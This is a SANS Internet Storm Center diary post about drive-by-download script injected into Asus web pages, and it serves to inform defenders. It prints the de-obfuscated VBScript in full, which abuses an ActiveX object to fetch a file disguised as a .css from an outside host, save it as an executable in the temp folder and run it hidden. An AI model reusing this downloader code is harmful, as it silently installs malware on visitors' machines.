Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Virus spreads from Asus Server - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Virus spreads from Asus Server
Robert has shared with us on a report that indicates drive-by-downloads injected in Asus pages:
http://www.heise-security.co.uk/news/82643

This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.

Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:

html
 <script language="VBScript">
   on error resume next
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"
   oGet   = "GET"
   fname1 = "AdCount.com"
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = "http://www.yyc8.com/script/src/rss3.css"
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2
   Set x  =  df.CreateObject(XML1&XML2,"")
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1
   x.Open oGet, dl, False
   x.Send
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)
   fname1  = F.BuildPath(tmp,fname1)
   S.open
   S.write x.responseBody
   S.savetofile fname1,2
   S.close
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0
   </script>
   <head>
   <title>Internet Explorer</title>
   </head><body></body>
/html

Koon Yaw

68 Posts

Sign Up for Free or Log In to start participating in the conversation!